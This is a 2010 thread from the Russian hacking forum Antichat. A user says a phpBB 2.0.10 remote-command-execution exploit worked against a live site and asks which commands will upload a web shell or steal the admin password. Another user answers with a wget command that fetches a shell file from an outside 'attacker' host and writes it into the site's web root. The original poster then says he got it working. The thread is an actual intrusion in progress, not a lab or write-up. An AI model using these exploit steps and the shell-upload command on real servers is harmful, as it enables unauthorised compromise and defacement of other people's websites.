Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Старые песня о главное (phpbb) нужна помощь (https://forum.antichat.xyz/showthread.php?t=220856)

FlooP1k 31.07.2010 15:35
Вобщем нашел очень "жирный" сайт на который прошел эксплоит:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]phpBB 2.0.10 Пропустим версии с 7 по 9[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]т[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]к[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]в них присутствует те же уязвимости[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]что и в phpBB 2.0.10[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Цель[/COLOR][COLOR="#007700"]: ([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]Выполение произвольных команд[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Описание[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Была выпущена так же в 2002. Данная версия встречается намного чаще[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]чем младшие[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Но реже чем старшие[/COLOR][COLOR="#007700"]=).[/COLOR][COLOR="#0000BB"]Был произведён дефейс сайта phpbb[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]с помощью найденной уязвимости в этой версии[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Описание уязвимости[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Некорректная обработка входных параметров в viewtopic[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Exploit[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//milw0rm.com/id.php?id=647 Запускать "perl exp.pl [*URL] [DIR] [NUM] [CMD]" Где [*URL] - урл сайта (например http://www.test.com), [DIR] - директория в которой находится форум(например /forum/ или /forum), [NUM] - номер топика (обязательно существующего), [CMD] - команда которую следует выполнить (например ls -la, справочник всех команд *nix /threadnav7345-1-10.html)[/COLOR][/COLOR] 
Конечно же темы /threadnav7345-1-10.html с *nix командами уже не существует, от сюда и возникает вопрос какие команды нужно использовать что бы залить шелл или получить пароль админа и потом залить шелл ?

Konqi 31.07.2010 15:39
wget http://attacker.ru/shell.txt -O /home/www/htdocs/1.php

ну или как то так

FlooP1k 31.07.2010 15:44
похоже немного по другому потому что пишет:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wget: missing URL

Usage: wget [OPTION]... ...

Try `wget --help' for more options.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

FlooP1k 31.07.2010 16:20
а все разобрался спасибо большое ...


Время: 17:38